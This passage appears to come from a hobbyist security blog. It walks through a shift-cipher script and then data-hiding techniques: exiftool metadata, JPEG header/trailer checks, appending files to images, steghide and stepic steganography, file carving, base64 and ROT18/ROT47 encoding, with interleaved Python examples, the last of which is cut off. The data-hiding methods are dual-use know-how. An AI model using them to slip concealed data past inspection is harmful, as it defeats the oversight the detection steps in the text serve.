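    """Cycle through a fixed list of shifts (a Vigenere-style numeric key)."""
    return lambda i: key[i % len(key)]


def encrypt(text: str, shift_at: Callable[[int], int]) -> str:
    return position_shift(text, shift_at)


def decrypt(text: str, shift_at: Callable[[int], int]) -> str:
    return position_shift(text, shift_at, decrypt=True)


if __name__ == "__main__":
    print(encrypt("computer", even_sequence))        # ESSXEFSH
    print(decrypt("ESSXEFSH", even_sequence))        # COMPUTER
    print(encrypt("abc def", from_key([1, 2, 3])))   # BDF EGI
```

Because the shift rule is a function of the position, the decrypt side is the same loop with the sign flipped; the trial and error the post describes is then a matter of swapping in candidate rules and reading the output.<br />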
<br />
It comes down to a lot of trial and error; in the past I have used a 'template' like the one below to stare at while thinking of possibilities.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/TEMPLATE_zps6c26b972.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/TEMPLATE_zps6c26b972.jpg" height="116" width="640" /></a></div>
<br />
<br />
<br />
<br />
There are so many possible variations that it can be quite a daunting task, and deciphering such an encoded message becomes a lot harder; however, with sufficient text and quite a bit of trial and error, success can be achieved !<br />
<br />
<br />
<br />
<br />
Should you feel inclined to give the scripts mentioned in this post a whirl, please let me know if any unexpected errors or weird output is encountered.<br />
<br />
<br />
Edit 30-07-2013<br />
---------------------<br />
I'll admit I do like the fact that people take an interest and take the time to download scripts that I put up here :)<br />
So far, over 100 people have taken the interest to do so, and I would be very interested to hear their thoughts on the cshift script !<br />
<i>(be gentle... ;) )</i><br />
I truly do appreciate feedback, and although I am only a hobbyist in this field and the code will make many eyes bleed, your thoughts on the script and possible improvements are always appreciated !<br />
<br />
Thanks for trying it out !</div>
<b>Data Obfuscation</b> (published 2013-01-05, updated 2013-02-06)<br />
<div dir="ltr" style="text-align: left;" trbidi="on">
Security through Obscurity<br />
========================<br />
<br />
Methods of hiding information without it appearing that there is any information is an interesting topic, and I recently got thinking about it following a few image challenges which were posted on various security sites a while ago.<br />
I failed miserably at the challenges, but at least picked a few things up on the way to my epic fail..<br />
<br />
Although security through obscurity is not truly secure, it is an interesting way of getting information to someone whilst keeping it hidden from the uninformed.<br />
<div>
<br /></div>
<i>This post is about simple methods that can be used to hide info from the uninformed; the methods described are not supposed to be terribly secure, but rather, interesting.</i><br />
<br />
The below was done on a VMware image of BackTrack 5 R3 and on a Windows 7 PC.<br />
<br />
The first stage is to have a look at the file information and see what information is revealed.<br />
<br />
<b>LOOKING AT THE BASIC INFORMATION OF AN IMAGE FILE</b><br />
<b>====================================================</b><br />
<br />
<b>Exif Data</b><br />
<b>-------------</b><br />
Image files often contain Exif data which can be read in the hex of a file, but using a tool such as Exiftool greatly simplifies this.<br />
<br />
exiftool will also give you information on the file type.<br />
<br />
exiftool can be run from the command line, and there is also a Windows GUI for exiftool available.<br />
Run 'exiftool file.jpg' from the command line and you will be presented with the information available in the file, which can include things like GPS position, camera make/model, software, comments, etc.<br />
<br />
General usage on command line ;<br />
<span style="color: lime;">exiftool matrix.jpg</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/matrix-1-1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="534" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/matrix-1-1.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
There are a huge number of options possible with exiftool, and it is a fantastic tool for reading and manipulating the information in image files.<br />
Check out the links at the bottom of this post for further information.<br />
<br />
<b>Hex Data</b><br />
<b>--------------</b><br />
Nearly all files have a so-called 'header' and 'trailer'; some file types only have a 'header'.<br />
The header and trailer are sections of the file which identify the file type, so Operating Systems understand what file format they are dealing with.<br />
These headers and trailers are typically unique to the file type, and a good resource for checking file signatures is ; <a href="http://www.garykessler.net/library/file_sigs.html" target="_blank">http://www.garykessler.net/library/file_sigs.html</a><br />
<br />
So when we have a file to examine, for instance a JPG file, open it with a Hex Editor (I am using Windows based HxD Hex Editor) and have a look at the file headers and trailers.<br />
<br />
Image file matrix.jpg;<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/matrix.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/matrix.jpg" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
You will see that the file starts with 'FF D8 FF' and ends with 'FF D9'.<br />
<br />
Image file header;<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/matrix_header.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/matrix_header.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Image file trailer;<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/matrix_trailer.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/matrix_trailer.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
If there is extra data after the <b>trailer</b> FF D9, then it is quite possible that something extra has been hidden in the file.<br />
The bytes following the FF D9 trailer can give you an idea of what the extra information is. In the below example the data after the FF D9 trailer starts with a known file header '50 4B 03 04' ('PK..' in ASCII), so it would appear that a zip file has been appended to the JPG.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/trailer-header.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/trailer-header.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
So by checking the information in a Hex editor you can quickly see whether the file appears to be what it is supposed to be, or whether something looks out of the ordinary.<br />
<br />
<br />
<br />
<b>ATTACHING INFORMATION TO A FILE</b><br />
<b>=================================</b><br />
With many file formats it is possible to attach extra data which can later be retrieved, based on the above principle of files having headers and trailers.<br />
<br />
kitty-hack1.jpg;<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/kitty-hack1.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="212" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/kitty-hack1.jpg" width="320" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
kitty-hack2.jpg;<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/kitty-hack2.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="239" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/kitty-hack2.jpg" width="320" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
For instance in Windows with 'Command Prompt';<br />
<span style="color: lime;">copy /b kitty-hack1.jpg + kitty-hack2.jpg kitty.jpg</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/kitty_copyb.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/kitty_copyb.jpg" /></a></div>
<br />
<br />
<br />
In Linux with 'cat' (lolz, no pun intended ;) ) ;<br />
<span style="color: lime;">cat kitty-hack1.jpg kitty-hack2.jpg > kitty.jpg</span><br />
<br />
The above commands copy/append the data of kitty-hack2.jpg to kitty-hack1.jpg and name<br />
the output file kitty.jpg.<br />
<br />
When checking kitty.jpg in a Hex Editor you will see the JPG trailer 'FF D9' of the first file followed by the JPG header 'FF D8 FF' of the second file.<br />
So although it looks like 1 file, there are in fact 2 files, which this check in a Hex editor confirms.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/kitty-hex.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="228" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/kitty-hex.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
I can't post the kitty.jpg here as the photo sharing site I use (Photobucket) removes any extraneous information after the first trailer it finds in jpeg files.<br />
This 'limitation' can be bypassed though by converting the 1st image to .bmp format (which has no trailer) and appending the 2nd image to the bmp file ;<br />
Result after converting the 1st image to .bmp format and then appending kitty-hack2.jpg with the above mentioned <b>copy /b</b> method ;<br />
<span style="color: lime;">copy /b kitty-hack1.bmp + kitty-hack2.jpg kitty.jpg</span><br />
<br />
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/kitty-1.jpg" imageanchor="1" style="clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" height="213" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/kitty-1.jpg" width="320" /></a><br />
<br />
<br />
Just by looking at the hex you would see something is up, and with a search for the JPG header 'FF D8 FF' in the above image you will find that the 2nd file is appended.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/kitty-bmp-jpg.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="228" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/kitty-bmp-jpg.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
This method of hiding files/data by copying/appending to files can be done with many filetypes.<br />
You can also for instance place files in a zip archive and copy this archive to an image in the<br />
same way (zip secret files, append to image file, image file can then also be opened with Archive tool);<br />
<span style="color: lime;">copy /b image.jpg + info.zip hidden.jpg</span><br />
<br />
Of course it should be noted that this is not at all a secure way of hiding information, but for those not in the know, there is no indication that extra information is even there.<br />
<br />
For instance I found this one online a while ago, can't remember where, but in any case if anyone objects to it being posted here, just say the word and I'll take it down. (image/content not made by me)<br />
Below is a .png file which contains a .rar file with content.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/Puzzling.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="" border="0" height="320" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/Puzzling.png" title="PUZZLING.JPG" width="233" /></a></div>
<br />
<br />
<br />
<br />
<b>STEGANOGRAPHY</b><br />
<b>================</b><br />
Steganography is the method of hiding information in a file in a way that only the recipient<br />
of the file should know about or be able to extract.<br />
There are quite a few programs out there that can do this, but none are really maintained.<br />
Steghide is a popular one which can hide information in various file types (JPG/BMP/WAV/AU)<br />
and is installed on most PenTest distros.<br />
<br />
If for instance you have a file 'passwords.txt' and want to hide it in an image 'forest.jpg'<br />
you would run steghide as follows ;<br />
<span style="color: lime;">steghide embed -cf forest.jpg -ef passwords.txt</span><br />
You can also specify a different filename for the output using -sf ;<br />
<span style="color: lime;">steghide embed -cf forest.jpg -ef passwords.txt -sf forest1.jpg</span><br />
You will be prompted to enter a password which you can do or else leave blank for no password.<br />
<br />
To later retrieve this information you would run steghide as follows ;<br />
<span style="color: lime;">steghide extract -sf forest1.jpg</span><br />
You will be prompted for a password, if there is none, simply hit enter to leave blank<br />
and steghide will attempt to extract the hidden data.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/steghide.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="440" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/steghide.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
forest.jpg;<br />
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/forest.jpg" imageanchor="1" style="clear: left; display: inline !important; float: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" height="240" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/forest.jpg" width="320" /></a><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
forest1.jpg<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/forest1.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="240" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/forest1.jpg" width="320" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Another interesting one is 'stepic', which is not installed on stock BT5R3 but can easily be installed with ;<br />
<span style="color: lime;">apt-get install python-stepic</span><br />
<br />
stepic uses LSB (least significant bit) methods to hide any data in an existing png file. It does not include a password / encryption option and so is not a secure method, but works fine to hide data.<br />
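An added example, not stepic's own code, of what LSB hiding does to the carrier: a constructed byte array stands in for a PNG's channel values, a 32-bit length prefix makes extraction self-delimiting, and the last function shows that each channel value changes by at most one unit, which is why the change is invisible to the eye yet trivially extractable by anyone who knows to look. Function names and the carrier are mine.<br />

```python
# Added example (not the post's or stepic's code): least-significant-bit
# hiding on a constructed byte array that stands in for the colour channel
# values of a PNG (one byte per channel, which is what stepic works on).
# The payload length goes into the first 32 bits so extraction knows where
# to stop; there is no password and no encryption, exactly as with stepic.
from __future__ import annotations


def embed_lsb(carrier: bytes, payload: bytes) -> bytes:
    """Return a copy of carrier whose LSBs spell out len(payload) followed by payload."""
    message = len(payload).to_bytes(4, "big") + payload
    bits = [(byte >> (7 - b)) & 1 for byte in message for b in range(8)]   # MSB first
    if len(bits) > len(carrier):
        raise ValueError(f"carrier holds {len(carrier)} bits, payload needs {len(bits)}")
    out = bytearray(carrier)
    for i, bit in enumerate(bits):
        out[i] = (out[i] & 0xFE) | bit        # clear the LSB, then set it to the message bit
    return bytes(out)


def extract_lsb(stego: bytes) -> bytes:
    """Read the length prefix, then that many bytes, from the LSBs."""
    def read_bytes(start_bit: int, n: int) -> bytes:
        value = 0
        for i in range(start_bit, start_bit + 8 * n):
            value = (value << 1) | (stego[i] & 1)
        return value.to_bytes(n, "big")

    length = int.from_bytes(read_bytes(0, 4), "big")
    if 32 + 8 * length > len(stego):
        # On an untouched carrier the 'length' is just noise and almost always
        # too large to fit, which is a cheap first check for "nothing here".
        raise ValueError("length prefix exceeds carrier: no valid LSB payload")
    return read_bytes(32, length)


def max_channel_delta(a: bytes, b: bytes) -> int:
    """Largest per-byte change between carrier and stego output (1 for pure LSB hiding)."""
    return max(abs(x - y) for x, y in zip(a, b))


# Constructed carrier: 256 'channel values' forming a gradient, not a real image.
CARRIER = bytes(range(256))


if __name__ == "__main__":
    stego = embed_lsb(CARRIER, b"hi")
    print(extract_lsb(stego))                     # b'hi'
    print(max_channel_delta(CARRIER, stego))      # 1
```

Statistically the altered LSBs are what steganalysis tools look for, so the technique hides the data from a casual viewer only; as the post says, it is not a secure method.<br />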
<br />
<span style="color: lime;">stepic -h</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/stepic-1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="408" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/stepic-1.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<b>FILE CARVING</b><br />
<b>=============</b><br />
File Carving is the process of extracting files from raw data based on their headers and trailers.<br />
This is usually done on whole disk images, mainly for data recovery purposes, for instance on damaged or unmountable drives from which data must be extracted.<br />
Programs used for such operations on Linux and available on most PenTest distros are for instance 'foremost' & 'scalpel'.<br />
<br />
The same principle however can be used on a single file if it appears that extra information is present within the file.<br />
<br />
So if you find a JPG file (file1.jpg) with extra information after the expected trailer,<br />
you could cut the first part of the file, from the header 'FF D8 FF' (start of the JPG)<br />
up to the end of the JPG (marked by FF D9).<br />
<br />
In your Hex editor select and cut the data from (the first, if there is more than one) 'FF D8 FF'<br />
up to and including 'FF D9' and save the file.<br />
<i>(you could then paste the cut section to a new file in HxD and save as file2.jpg to see</i><br />
<i>whether it matches what you saw in initial JPG file for verification)</i><br />
<br />
You should then have a stripped file which you can then check again for file properties.<br />
This file may have different properties, and so again you may have to look for headers and trailers.<br />
(is it a different filetype ? check headers and trailers with the aforementioned <b><i><a href="http://www.garykessler.net/library/file_sigs.html" target="_blank">file signatures</a></i></b> link)<br />
<br />
The above sequence is just a simple example. Data you come across may well require different methods;<br />
this example simply shows how you can 'carve' one file away from another<br />
when dealing with simple appended files.<br />
<br />
<br />
<br />
<br />
<b>BASIC ENCODING/ENCRYPTION</b><br />
<b>----------------------------------------</b><br />
Some basic encoding and/or encryption can also be used to further obfuscate the hidden data.<br />
The below examples are very weak methods of doing so; they simply show how<br />
data can be made harder to retrieve for someone who is not aware of the methods used to hide it.<br />
<br />
<b>BASE64</b><br />
<a href="http://en.wikipedia.org/wiki/Base64" target="_blank">base64</a> is a method to convert binary data to ASCII characters.<br />
This could for instance be used to append data to an image file in ASCII form, further obfuscating the data.<br />
<br />
base64 is installed on most linux distros, to use simply ;<br />
<span style="color: lime;">base64 inputfile > outputfile</span><br />
to decode ;<br />
<span style="color: lime;">base64 -d filein > fileout</span><br />
On Windows you could download base64.exe from <a href="http://www.fourmilab.ch/">www.fourmilab.ch</a><br />
<span style="color: lime;">base64.exe -e inputfile outputfile</span><br />
to decode<br />
<span style="color: lime;">base64.exe -d filein fileout</span><br />
<br />
<b>ROT13</b><br />
<a href="http://en.wikipedia.org/wiki/ROT13" target="_blank">ROT13</a> is an 'encryption' that basically moves all letters of the alphabet 13 places along, a variant of the <a href="http://en.wikipedia.org/wiki/Caesar_cipher" target="_blank">Caesar shift cipher</a>.<br />
ROT5 is the same method applied to digits, moving numeric values along by 5.<br />
Using them together is sometimes referred to as ROT18.<br />
<br />
So it is easy to identify and to encode or decode, even more so if you have a reference of some kind, and it is<br />
NOT a secure encryption method, but fun to play with.<br />
<br />
If you were to see a line of text like ; uggc://jjj.paa.pbz<br />
You can see that there are similarities with a normal web address, but the wording/letters don't appear to match up to what you would expect.<br />
Run a ROT13 script over the line uggc://jjj.paa.pbz ;<br />
<span style="color: lime;">echo uggc://jjj.paa.pbz | tr a-zA-Z n-za-mN-ZA-M</span><br />
and you will find the outcome ; http://www.cnn.com<br />
<br />
If there are digits there you could also include a ROT5 script and make it a ROT18.<br />
<br />
So a quick and dirty ROT18 one-liner could look like the below ;<br />
<i>encoding with ROT18</i><br />
<span style="color: lime;">echo "My birthday is 01-01-1900" | tr a-zA-Z0-45-9 n-za-mN-ZA-M5-90-4</span><br />
Zl oveguqnl vf 56-56-6455<br />
<br />
<i>Decoding with ROT18</i><br />
<span style="color: lime;">echo "Zl oveguqnl vf 56-56-6455" | tr a-zA-Z0-45-9 n-za-mN-ZA-M5-90-4</span><br />
My birthday is 01-01-1900<br />
<br />
<br />
I made a quick and dirty rot18 encoding/decoding script for shits and giggles, should it be of interest,<br />
which can be run either on direct input or on a file.<br />
Download;<br />
<a href="http://www.mediafire.com/file/qvfr0p0006oqzyp/rot18.sh" target="_blank">http://www.mediafire.com/file/qvfr0p0006oqzyp/rot18.sh</a><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/rot18-1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="376" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/rot18-1.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
A similar, but more elaborate variation is the <a href="http://en.wikipedia.org/wiki/ROT13" target="_blank">rot47</a> encryption.<br />
<br />
Same as the above, a simple script on rot47 encoding / decoding ;<br />
<a href="http://www.mediafire.com/file/83pag27jmfvqgqa/rot47.sh">http://www.mediafire.com/file/83pag27jmfvqgqa/rot47.sh</a><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/rot47-1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="448" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/rot47-1.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Very basic, but does the job.<br />
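Added example, not the post's rot18.sh or rot47.sh: the three rotations as translate tables, checked against the post's own sample strings, plus a brute force over all 26 Caesar shifts ranked by common English words, which is how a Caesar-family text is recognised when no reference is at hand. Function names and the small word list are mine.<br />

```python
# Added example (not the post's scripts): ROT13, ROT5, ROT18 and ROT47 as
# translate tables, and a ranked brute force over every Caesar shift.
from __future__ import annotations

import string

LOWER, UPPER, DIGITS = string.ascii_lowercase, string.ascii_uppercase, string.digits
PRINTABLE_94 = "".join(chr(c) for c in range(33, 127))   # '!' .. '~', the ROT47 alphabet


def _rotate_table(alphabet: str, n: int) -> dict[int, int]:
    """Map each character of alphabet to the one n places further on, wrapping round."""
    return {ord(c): ord(alphabet[(i + n) % len(alphabet)]) for i, c in enumerate(alphabet)}


ROT13 = {**_rotate_table(LOWER, 13), **_rotate_table(UPPER, 13)}
ROT5 = _rotate_table(DIGITS, 5)
ROT18 = {**ROT13, **ROT5}                  # letters by 13, digits by 5, as in the post
ROT47 = _rotate_table(PRINTABLE_94, 47)    # all 94 printable ASCII characters by 47

# Each rotation is half its alphabet's length, so each function is its own inverse.
def rot13(text: str) -> str: return text.translate(ROT13)
def rot18(text: str) -> str: return text.translate(ROT18)
def rot47(text: str) -> str: return text.translate(ROT47)


def caesar(text: str, n: int) -> str:
    """General Caesar shift of letters by n (digits and punctuation untouched)."""
    return text.translate({**_rotate_table(LOWER, n), **_rotate_table(UPPER, n)})


def rank_caesar_shifts(
    text: str,
    common_words: tuple[str, ...] = ("the", "and", "is", "my", "of", "to", "a", "in"),
) -> list[tuple[int, str]]:
    """Try all 26 shifts and return (shift, plaintext) pairs, most plausible first.

    Scoring is a count of common English words in the candidate; the tiny
    default list is a constructed stand-in for a real dictionary.
    """
    def score(candidate: str) -> int:
        return sum(w.strip(".,:;!?'\"") in common_words for w in candidate.lower().split())

    candidates = [(n, caesar(text, n)) for n in range(26)]
    return sorted(candidates, key=lambda c: -score(c[1]))


if __name__ == "__main__":
    print(rot13("uggc://jjj.paa.pbz"))                 # http://www.cnn.com
    print(rot18("My birthday is 01-01-1900"))           # Zl oveguqnl vf 56-56-6455
    print(rot47("Hello"))                               # w6==@
    print(rank_caesar_shifts("Zl oveguqnl vf 56-56-6455")[0])
```

The ranking is the practical half: a tr one-liner is fine when you already know it is ROT13, but on an unknown Caesar-style text the quickest route is to generate all 26 shifts and let a word list sort them.<br />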
<br />
<br />
<b>Consider this scenario of keeping/sharing your passwords ;</b><br />
<b>------------------------------------------------------------------------------</b><br />
-> Create your passwords.txt<br />
-> Zip passwords.txt and password protect it to pass.zip.<br />
<span style="color: lime;">zip pass.zip -e passwords.txt </span><br />
-> Encode pass.zip with base64 to pass.base<br />
<span style="color: lime;">base64 -w 0 pass.zip > pass.base</span><br />
(the '-w 0' prevents line wraps, which makes it easier to add to an image comment.)<br />
<br />
You could even ROT18 the file to further obfuscate the data ;<br />
ROT18 encode the base64 file<br />
<span style="color: lime;">cat pass.base | tr a-zA-Z0-45-9 n-za-mN-ZA-M5-90-4 > pass.rot</span><br />
-> Find or create a nice image that would not arouse suspicion.<br />
As the amount of data is so small, it can be included in the image comment, which is probably safer, as image hosting websites may strip superfluous info from the jpg.<br />
-> Add the data to the image comment using exiftool.<br />
<span style="color: lime;">info=$(cat pass.rot) ; exiftool performance.jpg -comment="$info"</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/pass1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/pass1.png" /></a></div>
<br />
<br />
-> Upload image file to photo or file sharing site and send yourself the link or whatever is appropriate.<br />
<br />
Performance.jpg ;<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/performance.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/performance.jpg" /></a></div>
<br />
<b><u>Retrieval ;</u></b><br />
<span style="color: lime;">exiftool performance.jpg -b -comment > out.put</span><br />
ROT18 decode the file<br />
<span style="color: lime;">cat out.put | tr a-zA-Z0-45-9 n-za-mN-ZA-M5-90-4 > rot.out</span><br />
Decode the base64<br />
<span style="color: lime;">base64 -d rot.out > pass.zip</span><br />
Unzip the created .zip file.<br />
<span style="color: lime;">unzip pass.zip</span><br />
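To show what the rot-style encodings above (the rot47 variant and the ROT18 tr pipeline) and the image-comment embedding actually do, here is an added example in Python; it is my own code, not the post's script and not part of exiftool or any other tool named here. It reimplements rot18 and rot47 as translation tables (both are their own inverse, so one function encodes and decodes), writes and reads the JPEG COM segment directly instead of calling exiftool, and runs the post's base64 -> ROT18 -> comment -> retrieval round trip on a constructed minimal JPEG and a constructed stand-in for pass.zip. The zip -e step is not reproduced, since Python's zipfile module cannot write encrypted archives; the bytes of a real pass.zip would simply be passed in as the payload. The names hide_payload, recover_payload, jpeg_comments and SAMPLE_JPEG are this example's own.

```python
import base64
import struct

# --- ROT-style obfuscation: each table is its own inverse, so one function encodes and decodes ---
LOWER = "abcdefghijklmnopqrstuvwxyz"
UPPER = LOWER.upper()
DIGITS = "0123456789"
PRINTABLE = "".join(chr(c) for c in range(33, 127))  # '!' .. '~', the 94 characters rot47 rotates


def _rot_table(alphabet, shift):
    return {ord(c): alphabet[(i + shift) % len(alphabet)] for i, c in enumerate(alphabet)}


ROT18_TABLE = {**_rot_table(LOWER, 13), **_rot_table(UPPER, 13), **_rot_table(DIGITS, 5)}
ROT47_TABLE = _rot_table(PRINTABLE, 47)


def rot18(text):
    """ROT13 on letters plus ROT5 on digits; the same mapping as the tr command in the post."""
    return text.translate(ROT18_TABLE)


def rot47(text):
    """Rotate every printable ASCII character by 47 (letters, digits and symbols alike)."""
    return text.translate(ROT47_TABLE)


# --- JPEG COM segment handling (what 'exiftool -comment=' and '-b -comment' do in the post) ---
SOS, COM = 0xDA, 0xFE


def _segments(jpeg):
    """Yield (offset, marker, total_length) for each marker segment between SOI and SOS."""
    if jpeg[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI marker")
    pos = 2
    while pos + 4 <= len(jpeg):
        if jpeg[pos] != 0xFF:
            raise ValueError("expected a marker at offset %d" % pos)
        marker = jpeg[pos + 1]
        if marker == SOS:  # entropy-coded scan follows; metadata segments all live before it
            return
        (length,) = struct.unpack(">H", jpeg[pos + 2:pos + 4])
        yield pos, marker, length + 2
        pos += length + 2


def jpeg_comments(jpeg):
    """Payload of every COM segment. This is also the analyst's check: a 'comment' holding
    kilobytes of base64-looking text in an innocuous photo deserves a closer look."""
    return [jpeg[pos + 4:pos + total] for pos, marker, total in _segments(jpeg) if marker == COM]


def add_jpeg_comment(jpeg, comment):
    """Insert a COM segment after the last existing header segment, just before SOS."""
    if len(comment) + 2 > 0xFFFF:
        raise ValueError("payload too large for a single COM segment")
    insert_at = 2
    for pos, _marker, total in _segments(jpeg):
        insert_at = pos + total
    segment = b"\xff\xfe" + struct.pack(">H", len(comment) + 2) + comment
    return jpeg[:insert_at] + segment + jpeg[insert_at:]


# --- the post's pipeline: payload -> base64 -> ROT18 -> image comment, and back again ---
def hide_payload(jpeg, payload):
    encoded = rot18(base64.b64encode(payload).decode("ascii"))
    return add_jpeg_comment(jpeg, encoded.encode("ascii"))


def recover_payload(jpeg):
    comments = jpeg_comments(jpeg)
    if not comments:
        raise ValueError("no COM segment found")
    return base64.b64decode(rot18(comments[-1].decode("ascii")))


# Constructed minimal JPEG skeleton (SOI, JFIF APP0, empty SOS, EOI); not a real photo.
JFIF_APP0 = b"\xff\xe0" + struct.pack(">H", 16) + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
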